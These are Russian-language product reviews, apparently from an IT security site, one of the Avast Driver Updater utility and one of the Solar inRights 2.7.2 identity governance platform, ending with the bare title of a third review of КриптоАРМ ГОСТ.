Утилита Avast Driver Updater позволяет автоматизировать регулярное обновление аппаратных драйверов для поддержания операционной системы Windows в стабильном состоянии. Avast Driver Updater проверяет обновления в реальном времени по онлайн-базе 500 000 драйверов и делает регулярные обновления простыми для пользователей. ВведениеФункциональные возможности Avast Driver UpdaterСистемные требования Avast Driver UpdaterУстановка и активацияРабота с Avast Driver Updater5.1. Сканирование5.2. Обновление5.3. Безопасность использования системы5.4. Создание резервных копий и восстановление драйверовВыводы ВведениеВо многих случаях аварийные отказы операционной системы происходят из-за ошибок в драйверах устройств. Устаревшие или отсутствующие драйверы способны вызвать массу проблем в работоспособности системы — от замедления скорости работы программного обеспечения до проблем совместимости оборудования и постоянного вылета в синий экран смерти (BSOD). Хотя производители аппаратуры регулярно выпускают обновления, которые позволяют использовать возможности компьютера более эффективно, многие пользователи не знают о них и годами пользуются устаревшими драйверами, смиряясь с ошибками системы. Кроме того, в регулярных обновлениях нуждаются и безошибочно работающие драйверы для обеспечения совместимости с новыми модификациями операционной системы и смежным оборудованием.Avast Driver Updater призван решить проблему регулярного обновления драйверов оборудования для операционной системы Windows. В базе утилиты более 500 000 драйверов — этого достаточно для поддержания актуальности не только популярных аудио- и видеокарт, микрофонов и принтеров, но и для исправления ошибок совместимости при использовании старых компьютеров. Функциональные возможности Avast Driver UpdaterAvast Driver Updater сканирует реестр Windows для определения конфигурации системы и необходимых для стабильной работы драйверов. В перечень определяемого оборудования входят принтеры, сканеры, цифровые камеры, видео- и сетевые адаптеры, а также звуковые и графические процессоры, устройства ввода, запоминающие устройства и их контроллеры, системные устройства и другие элементы системы.Ключевые функции Avast Driver Updater — это поиск последних версий драйверов для оборудования и их автоматическое обновление. Утилита также предложит обновить поврежденные или установить отсутствующие драйверы. Системные требования Avast Driver UpdaterAvast Driver Updater не требователен к ресурсам и будет работать практически на любом оборудовании. Вот минимальные требования, заявленные производителем: Windows XP/Vista/7/8/10 с последними пакетами обновлений (кроме версий Starter, RT, Mobile и IoT) базовая (32- или 64-разрядная версия);компьютер с процессором Intel Pentium 4 или AMD Athlon 64 (либо новее; необходима поддержка инструкций SSE2);256 МБ ОЗУ (или более);400 МБ свободного пространства на жестком диске;соединение с интернетом для загрузки, активации и обновления программы. Установка и активация Avast Driver UpdaterДля загрузки и активации программы требуется 400 МБ свободного пространства на жестком диске и соединение с интернетом. Разработчик предоставляет два варианта лицензии — бесплатная, только для проверки драйверов, и полная — с автоматической проверкой и возможностью установки обновлений. Стоимость полной версии на момент написания обзора — 850 р/год.Также утилиту можно установить в комплекте с Avast Antivirus. Работа с Avast Driver UpdaterПрограмма очень простая в использовании благодаря русскоязычному интерфейсу, который шаг за шагом ведет пользователя. При первом запуске Avast Driver Updater распознает оборудование и параметры системы. Прежде всего программа предложит запустить сканирование, чтобы автоматически выявить отсутствующие, неподходящие или устаревшие драйверы (рис. 1). Рисунок 1. Сканирование системы в Avast Driver Updater Среди других функций Avast Driver Updater предлагает резервное копирование и восстановление драйверов, а также автоматический и запланированный поиск драйверов в определенное время или с определенной частотой.СканированиеПроцесс сканирования системы занимает несколько секунд. В результате сканирования Avast Driver Updater визуализирует актуальность драйверов в виде таблицы. Кроме того, программа сразу показывает список проблемных драйверов, в котором можно выбрать, какие необходимо обновить. К сожалению, программа не предоставляет информации о дате выпуска обновляемого драйвера. Скачать выбранные драйверы можно вручную по одному, либо отметить несколько для автоматического скачивания и обновления (рис. 2). Подсказок о критичности обновления каждого конкретного драйвера программа также не дает. Рисунок 2. Результаты сканирования в Avast Driver Updater На этом этапе программа предложит ввести лицензионный ключ, чтобы скачать обновления. Пробная версия не позволяет скачать рекомендуемые драйверы через интерфейс программы (рис. 3). Рисунок 3. Активация программы Avast Driver Updater Настроить периодическое сканирование можно в разделе Параметры ▸Планирование (рис. 4). Программа способна автоматически проверять наличие обновлений драйверов по выбранному расписанию — ежедневно или еженедельно. Рисунок 4. Настройка периодического сканирования в Avast Driver Updater ОбновлениеAvast Driver Updater использует собственную облачную технологию для обновления нескольких драйверов одновременно без потери скорости. Разработчик сотрудничает более чем со 100 крупнейшими производителями оборудования для поддержания базы в актуальном состоянии, скачивание производится с сайтов официальных источников.Перед началом установки программа автоматически создает резервные копии обновляемых драйверов и точку восстановления операционной системы (рис. 5). Рисунок 5. Автоматическое создание резервных копий перед началом обновления в Avast Driver Updater Скорость обновления драйвера зависит от объема скачиваемых файлов — в нашем случае это заняло меньше минуты (рис. 6). Рисунок 6. Установка драйверов в Avast Driver Updater Чтобы снизить риск конфликтов оборудования, драйверы устанавливаются поочередно. При установке нескольких обновлений сразу может потребоваться несколько раз перезагрузить компьютер. После каждой перезагрузки программа Avast Driver Updater будет запускаться и отображать оставшиеся обновления.Безопасность использования системыЕсть мнение, что использование автоматических систем обновления может привести к сбоям в стабильности системы, однако производитель Avast Driver Updater проработал и эти риски. Перед установкой новых драйверов Avast Driver Updater создает резервные копии обновляемых драйверов, а также точку восстановления операционной системы. Эти действия позволяют сделать возврат к предыдущей стабильно работающей версии, если что-то пойдет не так.Создание резервных копий и восстановление драйверовВ разделе Резервное копирование можно управлять резервными копиями установленных драйверов — настроить расположение по умолчанию, перенести копии в другое место или создать новые (рис. 7). Рисунок 7. Просмотр резервных копий драйверов в Avast Driver Updater Такая функция дает определенные преимущества перед установкой обновлений вручную — повышает уровень безопасности процесса обновления, если пользователь не делает копии самостоятельно. Для бдительных пользователей, регулярно создающих точки восстановления, эта функция поможет избежать риска забыть сделать копии.Если необходимо восстановить ранее обновленные драйверы, можно загрузить их в соответствующем пункте меню. Кроме того, программу можно использовать для восстановления копии операционной системы из заранее сохраненной точки (рис. 8). Рисунок 8. Интерфейс восстановления версий драйверов и операционной системы в Avast Driver Updater Выбрать расположение, куда сохранять и откуда будут автоматически восстанавливаться резервные копии, можно в разделе Параметры (рис. 9). Здесь же можно настроить, будет ли выполняться перезагрузка компьютера после восстановления из резервной копии. Рисунок 9. Настройка параметров резервного копирования в Avast Driver Updater ВыводыПроверить актуальность драйверов можно и штатными средствами через панель управления Windows. Но поскольку это не очень удобно, регулярное обновление и поддержка драйверов устройств в актуальном состоянии часто становится непростой задачей и требует много времени, особенно для людей, которые не знакомы с тонкостями работы компьютера и операционной системы. Кроме того, источником обновлений в этом случае выступает Microsoft, а не производители оборудования, поэтому версия драйвера не всегда может быть актуальной.Тем не менее, регулярное обновление драйверов улучшает производительность компьютера — многие сбои и ошибки системы вызваны проблемами с устаревшими драйверами.Avast Driver Updater успешно справляется со своей главной задачей — сделать регулярные обновления драйверов простыми для пользователя. Программа проверит текущие установленные версии драйверов всех распространенных устройств и элементов системы. Наиболее эффективным решением будет настроить регулярную проверку обновлений, совпадающую с работой Центра обновления Windows — многие производители выпускают новые драйверы сразу после выходов новых пакетов обновлений операционной системы.Для сканирования в режиме реального времени используется динамическая онлайн-база драйверов с сайтов производителей. Avast Driver Updater покажет, какие обновления доступны, и, в платной версии, поможет их установить. Это гораздо удобнее, чем ручная проверка каждого драйвера устройств штатными средствами операционной системы.Преимущества: Большая база данных драйверов от различных производителей.Высокая скорость сканирования.Обновление всех устаревших драйверов одним нажатием.Поддержка всех популярных версий Windows XP/Vista/7/8/10.Автоматическое создание резервных копий драйверов и операционной системы для восстановления в случае возникновения проблем совместимости.Скачивание драйверов с официальных сайтов производителей оборудования.Недостатки:Необходимость несколько раз перегружать компьютер в процессе установки пакета драйверов вместо единой перезагрузки после всех обновлений.Ручное управление диалоговыми окнами установщиков драйверов.Нет информации о дате выпуска обновляемого драйвера.Достаточно высокая стоимость приложения.Тестовая версия не позволяет обновить драйверы.
Обзор IGA-системы Solar inRights 2.7.2
February 25, 2019, 10:24 am

Solar inRights — IGA-платформа для повышения уровня ИБ и оптимизации работы пользователей в информационных системах (ИС) крупных организаций. Обеспечивает автоматическое исполнение регламентов управления доступом, управление жизненным циклом учетных записей и ролей в ИС. Снижает риски, связанные с ошибками исполнения процедур предоставления доступа, избыточными полномочиями, повышает прозрачность управления доступом. ВведениеОсновные возможности Solar inRights 2.7.2Новое в Solar inRights 2.7.2Общий принцип работы Solar inRights 2.7.2Функциональные возможности Solar inRights 2.7.2Работа с Solar inRights 2.7.26.1. Стартовая страница и основные элементы интерфейса6.2. Список сотрудников6.3. Просмотр основной информации о пользователе6.4. Создание заявок (запрос дополнительных полномочий)6.5. Согласование заявок6.6. Управление ролевой моделью6.7. Информация по системам6.8. Обновленный графический редактор ролей6.9. Переработанный каталог ролей и конфигуратор доступа6.10. Быстрая настройка парольных политик6.11. Мастер подключения информационных систем6.12. ОтчетностьЛицензирование Solar inRights 2.7.2Выводы ВведениеС ростом и развитием компаний в современном мире увеличивается количество сотрудников, расширяется ландшафт используемых информационных ресурсов. Как структурировать доступ сотрудников в информационные системы (ИС) и управлять этим доступом без потерь и рисков для бизнеса? Решение таких задач по автоматизированному управлению доступом сотрудников в информационные системы в крупной компании возлагается на продукты класса IDM (Identity Management)/IGA (Identity Governance and Administration).С каждым годом зрелость компаний в вопросах регламентации и контроля доступа увеличивается и соответственно возрастает потребность в более совершенном продукте, который не только позволит управлять процессом предоставления доступа в информационные системы, но и возьмет на себя задачи управления полным жизненным циклом пользователей и их ролей в системах, а также решит вопросы разграничения «токсичных» прав, аналитики и отчетности. Как следствие, концепция класса Identity Management эволюционировала и трансформировалась в концепцию Identity Governance and Administration (IGA), в центре внимания которой находится непосредственно человек и его деятельность, а не корпоративные системы. О новой версии такой платформы Solar inRights 2.7.2 пойдет речь в нашем сегодняшнем обзоре. Основные возможности Solar inRights 2.7.2Solar inRights 2.7.2 автоматизирует процесс управления жизненным циклом учетных записей пользователей в соответствии с кадровыми событиями в компании. Система позволяет просто и быстро запускать согласование или предоставление полномочий на доступ при трудоустройстве нового сотрудника, переводе по должности, изменении кадрового статуса и т. п. Все основные операции управления правами доступа к информационным ресурсам организации осуществляются в автоматическом режиме.С помощью данной IGA-системы пользователь может в несколько кликов создавать необходимый набор учетных записей с базовым перечнем полномочий для новых сотрудников на основе ролевой модели организации. Блокировка доступов сотрудника по различным кадровым событиям также реализуется автоматически, однако система позволяет сотрудникам подразделений информационной безопасности и IT осуществлять и экстренную ручную блокировку полномочий.Решение обеспечивает централизованное управление доступом сотрудников к информационным системам, включая назначение или отзыв полномочий сотрудника к подключенным ИС, управление парольными политиками к подключенным целевым системам. В случае если автоматическое управление учетными записями в определенной информационной системе не реализовано, с помощью Solar inRights возможно создание заявок на их ручное исполнение.Кроме того, данная IGA-система позволяет автоматизировать контрольные процедуры управления правами доступа пользователей. В частности, реализован периодический пересмотр прав доступа сотрудников, если этого требуют внутренние регламенты или регуляторы. В автоматическом режиме осуществляется процесс сверки прав доступа сотрудников и оповещения администратора системы в случае нахождения несогласованных полномочий. Также система автоматически контролирует правила разграничения полномочий в случае, если они определены в компании.Важным преимуществом Solar inRights 2.7.2 является возможность довольно быстрого подключения новых целевых систем и использование стандарта коннекторов ICF. Новое в Solar inRights 2.7.2В новой версии Solar inRights 2.7.2 продолжено развитие интерфейса, ориентированного на пользователя: вместе с оптимизацией UI сделан большой шаг в сторону реализации удобных инструментов для настройки системы, которые существенно упрощают внедрение и сопровождение системы. Таким образом функциональность расширилась следующими инструментами:Трудоустройства. Доработан механизм трудоустройств, позволяющий в полной мере использовать возможности совместительства как в рамках организационно-штатной структуры предприятия, так и в качестве инструмента управления проектной деятельностью сотрудников и внесения в систему работников внешних компаний, оформленных по договору.Графический редактор ролей. Появилась удобная возможность создания и редактирования ролей в графическом интерфейсе системы. Процесс становится доступным и интуитивно понятным всем пользователям системы с необходимым набором полномочий.Переработанный каталог ролей и конфигуратор доступа. Каталог ролей является иерархической структурой, которая легко и понятно настраивается непосредственно из интерфейса системы.Быстрая настройка парольных политик. Настройка парольных политик производится непосредственно через удобный интерфейс и учитывает массу различных факторов, позволяющих сконфигурировать систему в соответствии с внутренними регламентами и стандартами организации.Мастер подключения информационных систем. В Solar inRights 2.7.2 большое внимание уделено упрощению подключения новых целевых систем. Для инженеров создан новый интерфейс, позволяющий в едином окне конфигурировать и проводить проверку коннекторов к подключаемым системам. Общий принцип работы Solar inRights 2.7.2Рассмотрим схему работы системы.Solar inRights подключается ко всем ключевым информационным системам организации и дает возможность централизованно управлять пользователями и их полномочиями. Рисунок 1. Схема работы SolarinRights 2.7.2 Поставщиком данных о сотрудниках в Solar inRights 2.7.2, как правило, являются системы кадрового учета. Однако решение позволяет собирать информацию и из внешних источников, а при необходимости даже заносить данные вручную через интерфейс.Кроме того, решение Solar inRights 2.7.2, будучи интегрированным с целевыми системами заказчика, является участником двустороннего процесса: с одной стороны, анализирует информацию о пользователях и их полномочиях, а с другой — в автоматическом режиме управляет правами пользователей. Последние работают с системой через эргономичный веб-интерфейс, в котором свободно ориентируются как специалисты ИБ и ИТ-подразделений, так и рядовые сотрудники компании: здесь не составит труда создать заявку на доступ к той или иной системе или, например, изменить пароль.IGA-решение Solar inRights 2.7.2 осуществляет автоматизированное управление доступом к информационным системам либо в полностью автоматическом режиме, либо с привлечением пользователя, например, в процессе согласовании заявок. Функциональные возможности Solar inRights 2.7.2Solar inRights 2.7.2 в оперативном режиме предоставляет полную информацию о правах доступа сотрудников в информационных системах компании. Таким образом администратор решения имеет возможность в любое необходимое время оценить, какие сотрудники и к каким системам и ресурсам организации имеют доступ.Помимо этого, Solar inRights 2.7.2 является отличным инструментом для служб информационной безопасности при расследовании инцидентов: с помощью нескольких действий специалист по информационной безопасности получает исчерпывающую информацию о наличии прав доступа пользователей на запрашиваемую дату и имеет возможность проанализировать любые изменения прав доступа, совершенные на любой момент в прошлом.Карточка сотрудникаВ карточке сотрудника Solar inRights 2.7.2 отображаются подробные сведения о правах доступа сотрудника, начиная с назначенных ролей и заканчивая списком учетных записей в информационных системах. Передовая система drill-down позволяет перейти по ссылкам на соответствующие заявки, из которых можно извлечь такие подробности по предоставленным сотруднику правам и назначенным ролям, как, например, список лиц, согласовавших доступ, даты согласования, принятые решения, комментарии и тому подобную информацию.Карточка ИСВ данной карточке пользователь может увидеть список всех учетных записей, заведенных в информационной системе, узнать их принадлежность, вести учет технологических и бесхозных аккаунтов. Причем, в Solar inRights 2.7.2 эта информация в карточке ИС может быть представлена в самых разных срезах: например, можно автоматически сгруппировать учетные записи по отсутствию владельца или дате последнего входа в систему, извлечь заблокированные и технологические аккаунты.Централизованное управление доступом к ИСРассматриваемая IGA-платформа позволяет централизованно управлять доступом сотрудников к информационным системам. С ее помощью администратор может назначать или отзывать полномочия персонала в информационных системах, заблокировать или разблокировать доступ конкретному сотруднику сразу во всех или же в отдельных системах, осуществлять смену пароля одной или сразу нескольких учетных записей сотрудника и многое другое.Совмещение должностейSolar inRights 2.7.2 предусматривает возможность совмещения сотрудниками нескольких должностей в рамках компании или ее филиалов. В соответствующей функции учитываются все занимаемые работником компании должности, представленные в системе в виде трудоустройств. Таким образом все процессы управления доступом для сотрудников, работающих по совместительству, будут вестись с учетом конкретных трудоустройств. Например, если сотрудник запрашивает полномочия на доступ к той или иной системе организации, администратор IGA-платформы может выбрать, в рамках какого трудоустройства такой доступ следует назначить. А если сотрудник завершает трудовую деятельность по одному из трудоустройств, то можно отозвать лишь назначенные для данной должности права.Бесхозные и технологические учетные записиС помощью системы Solar inRights версии 2.7.2 можно отслеживать владельцев технологических аккаунтов. Практически во всех информационных системах встречается некоторое количество учетных записей, созданных для осуществления взаимодействия между системами, тестирования различных функций и возможностей и тому подобного. В предыдущих версиях платформы такие учетные записи относились к разряду бесхозных, в новой же версии администратор может классифицировать их как технологические и зафиксировать их принадлежность определенному сотруднику. Таким образом, из системы можно в любой момент извлечь список технологических аккаунтов, следить за их актуальностью, например, с помощью уведомлений об уходе из организации их владельцев, разделять бесхозные и технологические учетные записи.Выдача полномочий для подразделенийРассматриваемое решение позволяет назначать полномочия и роли не только для конкретных сотрудников и групп сотрудников, но и в целом для подразделений компании, с распространением данных полномочий на весь персонал подразделения. Причем подобное назначение может быть реализовано как в полностью автоматическом режиме, так и после ручного согласования уполномоченными сотрудниками заявок, которые система может автоматически создавать.Автоматизация согласования доступаБлагодаря Solar inRights 2.7.2 владелец платформы может полностью автоматизировать процесс согласования доступа у себя в компании. Система согласования заявок в данном решении хорошо развита и удобна, с ее помощью можно оперативно выстраивать любые маршруты с учетом устоявшихся в организации регламентов выдачи и контроля прав доступа к информационным ресурсам. Новая версия поддерживает различные типы заявок: можно запросить любой стек полномочий для любого числа сотрудников в рамках одной заявки, а также запросить временные права. Кроме того, администратор может назначить согласование заявки нескольким ответственным сотрудникам, разделив ее на части с последующей автоматической сборкой в единую заявку. Платформа также позволяет назначать заместителей по согласованию заявок, а в случае отсутствия согласования в установленный срок эскалировать задачу на вышестоящее должностное лицо.Пересмотр прав доступаРеализованные в рамках данной IGA-платформы инструменты позволяют решить проблему наличия в организации избыточных прав доступа сотрудников к ИС, благодаря предусмотренной процедуре актуализации полномочий сотрудников и обнаружению несогласованных учетных записей. Поводом к пересмотру прав доступа является, например, кадровое событие, однако в системе также заложена возможность установки расписания подобного пересмотра. Эта процедура не только ведет к снижению избыточных прав пользователей в компании, но и позволяет корректно передавать ответственность за доступ сотрудника при смене руководителя. Работа с Solar inRights 2.7.2Посмотрим, как основная функциональность решения выглядит со стороны пользователя системы. Пользователю доступны только те элементы интерфейса, на доступ к которым у него есть разрешения согласно его роли в системе Solar inRights.Стартовая страница и основные элементы интерфейсаКаждый пользователь, прошедший успешную авторизацию, оказывается на стартовой странице системы. Рисунок 2. Стартовая страница Solar inRights 2.7.2 В левой части страницы размещены навигационные иконки для перехода в разные разделы системы.В шапке представлены ярлыки быстрого перехода к основным разделам.Центральная часть страницы разделена на два блока:«Отправленные заявки», где находятся заявки, созданные сотрудником, но пока еще не выполненные;«Входящие заявки» — это заявки, требующие согласования сотрудника.Список сотрудниковЧерез меню навигатора переходим в раздел «Пользователи». Рисунок 3. Список карточек сотрудников в Solar inRights 2.7.2 Открывшаяся страница позволяет осуществлять управление пользователями. Здесь отображается список всех пользователей системы. Данные автоматически поступают сюда из кадрового доверенного источника. Также есть возможность добавления новых пользователей вручную, в случаях, когда к системе подключаются сотрудники внешних организаций, например, работающие по договору.Вся информация удобно структурирована и представлена в виде таблицы с возможностью фильтрации и сортировки.Отметив в правой колонке одного или нескольких пользователей, можно осуществить их немедленную блокировку в подключенных информационных системах. Также быстро можно разблокировать ранее заблокированных пользователей.Просмотр основной информации о пользователеКликнув на ФИО пользователя в списке, мы переходим в карточку сотрудника. Рисунок 4. Карточка сотрудника в Solar inRights 2.7.2, общая информация Здесь размещены несколько вкладок с подробной информацией о пользователе и его доступе:«Информация о сотруднике» показывает подробную информацию о сотруднике из кадрового источника;«Трудоустройства» показывает основание трудоустройства с указанием даты приема, должности, руководителя и т. д.;«Роли» показывает все роли сотрудника. На этой вкладке в поле «основание» можно увидеть базовые роли, предоставленные на основании штатной позиции, а также роли, назначенные по отдельной заявке через интерфейс системы. Если роль назначена по заявке, кликнув на ее номер, можно просмотреть информацию об инициаторе и согласующем данного полномочия; Рисунок 5. Карточка сотрудника в Solar inRights 2.7.2, роли «Учетные записи» отображает перечень учетных записей сотрудника и полномочий в информационных системах. С этой страницы можно осуществить смену пароля и экстренной блокировки или разблокировки какой-либо учетной записи, если эти опции доступны согласно предоставленным пользователю Solar inRights функциям. Данные действия автоматически транслируются в соответствующую информационную систему; Рисунок 6. Карточка сотрудника в Solar inRights 2.7.2, учетные записи и полномочия «История изменения ролей» отображает все факты по назначению и отзыву ролей пользователя, с указанием основания. Данные представлены в хронологическом порядке.Создание заявок (запрос дополнительных полномочий)Если пользователю требуются дополнительные расширенные права, помимо стандартного набора, предоставленного автоматически, он имеет возможность создать заявку на главной странице системы. В зависимости от уровня доступа можно оформлять заявки не только на себя, но и на других сотрудников, например, на правах руководителя.Заявку можно создать на нескольких сотрудников одновременно. Рассмотрим пример создания заявки. Рисунок 7. Создание заявки в Solar inRights 2.7.2, выбор сотрудников Первым шагом выбираем из общего списка пользователей сотрудника. Если необходимо выбрать несколько сотрудников одного отдела, удобно воспользоваться фильтрами, расположенными в верхней части экрана.Далее, переходя на следующий экран, выбираем роли, которые хотим запросить. Для удобства выбора роли сгруппированы по каталогам, которые могут быть заранее настроены по необходимым критериям (по функциональности, по подразделениям и т. п.).Количество запрашиваемых ролей и прав не ограничено и может быть любым. Рисунок 8. Создание заявки в Solar inRights 2.7.2, выбор полномочий Двигаемся далее на следующий экран — перед нами сводка по нашему запросу. На сводке указаны сотрудники, для которых запрашивается доступ и полномочия, которые мы отметили. Рисунок 9. Создание заявки в Solar inRights 2.7.2, выбор параметров и отправка В отдельном поле этого экрана можно указать срок действия авторизации дополнительных прав, если права запрашиваются на время. По истечении указанного времени будет сформировано уведомление об отзыве прав, затем, если не последует продления, права будут автоматически отозваны.Переходя на экран отправки заявки, можно добавить к ней комментарии. После завершения оформления заявка переходит в статус отправлена и отображается в левой части стартовой страницы пользователя в разделе «Отправленные заявки».Согласование заявокСистема предусматривает гибкие возможности настройки маршрутов согласования. Они настраиваются исходя из утвержденных процессов организации. Маршруты согласования могут различаться для каждого запрошенного полномочия или роли. Заявка автоматически проходит по заданному маршруту согласования и может быть либо подтверждена, либо отклонена согласующим сотрудником.Ответственному за согласование сотруднику автоматически направляется письмо с уведомлением. Пройдя по ссылке из письма, сотрудник попадает в карточку заявки, где указано, кому и какие права запрошены, на какой срок, резолюция предыдущего согласующего. Помимо запрошенных прав в каточке запроса можно просмотреть действующие права сотрудника. Также перейти на карточку заявки можно со стартовой страницы системы, где в левой части экрана находится раздел «Входящие заявки».На этапе согласования можно согласовать, отклонить или делегировать решение по заявке другому специалисту. При положительном решении можно оставить комментарий. При полном или частичном отклонении комментарий является обязательным.Предусмотрено также частичное согласование по одному или нескольким сотрудникам. Рисунок 10. Согласование заявки в Solar inRights 2.7.2 Когда все этапы согласования завершены положительно, заявка автоматически переходит на исполнение.Открыв карточку сотрудника, на вкладке «Роли» пользователь видит назначенные полномочия, основания их назначения и сроки.Управление ролевой модельюЧерез меню навигатора переходим в раздел «Организационная структура».В этом разделе представлена штатная структура организации и совмещенная с ней ролевая модель, в которую включены базовые роли пользователей, которые назначаются сотрудникам на основании штатной позиции. Рисунок 11. Ролевая модель в Solar inRights 2.7.2 При изменении структуры организации или функциональной модели ролевую модель также можно легко модифицировать. Для этого в левой части экрана необходимо выбрать подразделение штатной структуры, для которого требуется внести изменения и с помощью функциональных клавиш добавить или удалить необходимую роль в правой части экранной формы. Роль добавляется в базовый набор, и все сотрудники, оформляющиеся на работу в данное подразделение, будут получать эти полномочия автоматически, как только поступит уведомление из кадрового источника.На все роли распространяется правило наследования по иерархии. То есть при трудоустройстве в определенное штатное подразделение сотруднику будут автоматически назначены роли вышестоящего подразделения.Информация по системамПереходим в раздел «Информационные системы».В списке подключенных информационных систем выбираем одну из них, кликая на нее. Открывается окно со списком всех учетных записей этой системы. Рисунок 12. Информация по системе в Solar inRights 2.7.2 В верхней части экрана размещены фильтры, с помощью которых можно выделить активные и заблокированные учетные записи, неиспользуемые и технологические (сервисные).В центральной части экрана размещена информация о владельцах учетных записей, дате создания и назначенных правах в информационной системе.Из активных функций этого экрана можно выделить:возможность экстренной блокировки или разблокировки учетной записи;возможность смены пароля;назначение или изменение владельца;назначение категории учетной записи — «персональная» или «технологическая».Обновленный графический редактор ролейПереходим в раздел «Управление ролями». Этот раздел открывает широкие возможности по управлению ролями и по анализу данных для построения ролевой модели.Кликнув на любую из ролей, открываем «Карточку роли». Рисунок 13. Карточка роли в Solar inRights 2.7.2 На этом экране в соответствии с доступными правами пользователя системы можно:проанализировать, к каким системам авторизован сотрудник и с какими правами;видеть структуру роли: ее родительские роли и внутренние, включенные в роль права;оперативно создавать и менять роль и ее состав;настраивать подразделения и должности, для которых роль является базовой.В системе реализован набор предустановленных «технологических» ролей для упрощения процесса внедрения. Рисунок 14. Карточка роли в Solar inRights 2.7.2 (состав пользователей)Переработанный каталог ролей и конфигуратор доступаНа вкладке «Каталог ролей» открывается удобный и легко настраиваемый конфигуратор для настройки каталогов. Каталог ролей является иерархической структурой. Роли могут быть объединены в каталоги по функциональному признаку или по штатной структуре. Рисунок 15. Конфигурация каталога ролей в Solar inRights 2.7.2 Видимость каталога ролей для сотрудников подразделений теперь определяется непосредственно в интерфейсе системы в разделе «Организационная структура». Рисунок 16. Настройка доступа к каталогам ролей в Solar inRights 2.7.2 На вкладке «Сравнение ролей» возможно проведение анализа имеющихся прав доступа по выбранным сотрудникам. Переходя по функциональным клавишам, пользователь может просмотреть совпадающие и различающиеся роли. Рисунок 17. Аналитический модуль по правам пользователей в Solar inRights 2.7.2 Вкладка «Анализ ролевой модели» позволяет сформировать аналитический отчет по количеству совпадающих прав у определенного числа сотрудников того или иного подразделения. Рисунок 18. Анализ ролевой модели в Solar inRights 2.7.2Быстрая настройка парольных политикВ разделе «Парольная политика» открывается удобный интерфейс по настройке парольной политики в соответствии с внутренними регламентами, утвержденными стандартами организации и требованиями регуляторных органов. Рисунок 19. Настройка парольных политик в Solar inRights 2.7.2Мастер подключения информационных системВ разделе «Подключения информационных систем» единое окно конфигурации и проверки коннекторов к подключаемым информационным системам позволяет оперативно в три этапа добавить новую систему в Solar inRights 2.7.2:выбор подходящего коннектора к информационной системе;настройка подключения системы и выбор шаблона подключения;импорт объектов системы — пользователей и полномочий в Solar inRights. Рисунок 20. Параметры коннектора в Solar inRights 2.7.2ОтчетностьВ разделе «Отчеты» размещен базовый набор отчетов из коробки, которые можно формировать на основании регистрации действий в системе.Возможно построение отчета о текущих правах пользователя и правах на любую дату в прошлом, об изменении состава прав.Также возможно построение отчетов по заявкам, оформленным в системе. Удобные фильтры позволяют задать необходимые критерии по датам и статусам заявок. Рисунок 21. Параметры отчета «Карточка пользователя на заданную дату» Рисунок 22. Отчет «Карточка пользователя на заданную дату» выгруженный в .pdf Для подготовки собственных форм отчетов в системе реализован дизайнер отчетов, позволяющий как внести корректировки в уже существующие, так и создавать новые отчеты. При этом нужно учитывать порой достаточно сложную структуру данных, необходимую для формирования отчетной формы, которая может потребовать навыков администрирования для ее реализации. Лицензирование Solar inRights 2.7.2Новая версия Solar inRights 2.7.2 сохранила за собой удобную схему лицензирования по количеству работающих сотрудников с учетом 20% запаса на внештатных сотрудников организации.Все ранее разработанные коннекторы для подключения информационных систем входят в стоимость лицензий, а сами лицензии имеют удобную модульную структуру.Функциональность Solar inRights разделена на 7 ключевых модулей, позволяющих приобретать только необходимый на данный момент инструментарий системы. В зависимости от потребности можно докупать дополнительные модули и развивать IGA-систему. Данная модель лицензирования хорошо подходит для реализации различных вариантов внедрения решения. Существует несколько принципиальных вариантов внедрения систем класса IdM/IGA.Контроль. Целевые системы подключаются для получения актуальной информации:имеется полная информация о доступе сотрудников в целевые системы;формируются отчеты, хранится историческая информация о доступе сотрудников.Автоматизация. Целевые системы подключаются для управления через IdM/IGA:автоматизировано большинство операций;системы управляются через IdM/IGA;трудозатраты администраторов по управлению доступом снижаются.Гибрид. Совмещение вариантов «Автоматизация» и «Контроль»:часть операций автоматизирована;часть систем подключена для контроля доступа сотрудников.Модель лицензирования, основанная на возможности компоновки функциональности IGA-решения различными модулями, хорошо подходит для реализации каждого из вариантов построения системы. Например, при необходимости построения ролевой модели и понимания «кому, куда и на каком основании предоставлен доступ» будет достаточно базового модуля ядра Solar inRights в режиме чтения. ВыводыSolar inRights версии 2.7.2 представляет собой современную и полноценную IGA-платформу, на основе которой организация имеет возможность получить качественную систему управления правами доступа сотрудников с учетом всех специфических процессов и требований отечественных заказчиков. С момента выхода первой версии в 2015 году система проделала большой эволюционный путь в плане развития архитектуры, функциональности, эргономики. Сейчас IGA-система Solar inRights является абсолютно зрелым решением: она развернута и несколько лет успешно эксплуатируется в ряде системообразующих российских предприятий нефтегазовой, промышленной, банковской сферы, госструктурах.Интерфейс взаимодействия с пользователем постоянно развивается, оставаясь при этом дружелюбным и ориентированным на пользователя. В версии 2.7.2 добавились новые возможности графической настройки системы: графический редактор ролей, интерфейс конфигурации доступных каталогов ролей и настройки парольной политики, мастер подключения информационных систем. Эти возможности позволяют сократить ресурсозатраты на внедрение и сопровождение системы, что в свою очередь снижает совокупную стоимость владения системой.Важным плюсом решения является поддержка стандарта Identity Connector Framework (ICF): появляется возможность повторного использования ранее разработанных интеграционных механизмов при миграции с других решений и сокращаются трудозатраты при написании коннекторов к новым целевым системам.Дополнительным преимуществом является включение решения Solar inRights в Единый реестр российских программ для электронных вычислительных машин и баз данных. Также продут является более привлекательным для клиентов российского бизнеса, так как имеет сертификат ФСТЭК России на соответствие 4 уровню контроля отсутствия недекларированных возможностей и выполнение требований технических условий. Сертификат дает возможность использования решения при создании автоматизированных систем до класса защищенности 1Г включительно, а также для защиты информации в информационных системах персональных данных (ИСПДн) всех уровней защищенности.ПреимуществаСовременный эргономичный интерфейс, упрощающий и ускоряющий работу пользователей с системой.Гибкость решения, которая дает возможность заказчикам настраивать нетиповые процессы управления доступом, не прибегая к доработкам программного обеспечения.Система плагинов, позволяющая добавлять в систему новые функции без внесения изменений в основное ядро.Поддержка фреймворка OpenICF для разработки коннекторов. Данный открытый фреймворк имеет online-документацию и большое количество коннекторов к информационным системам, разработанных сообществом.Продукт российской разработки, внесен в реестр отечественного ПО, совместим с проприетарными и свободно распространяемыми ОС и СУБД.Имеет сертификат ФСТЭК России на соответствие 4-му уровню контроля отсутствия НДВ.НедостаткиПродукт является IGA-платформой, предназначенной прежде всего для решения задач крупных предприятий. Его внедрение в небольших компаниях не представляется рентабельным.На сегодняшний день обеспечены не все возможности по конфигурации системы без участия инженера.
Обзор КриптоАРМ ГОСТ — средства подписи и шифрования электронных документов
February 27, 2019, 10:00 pm

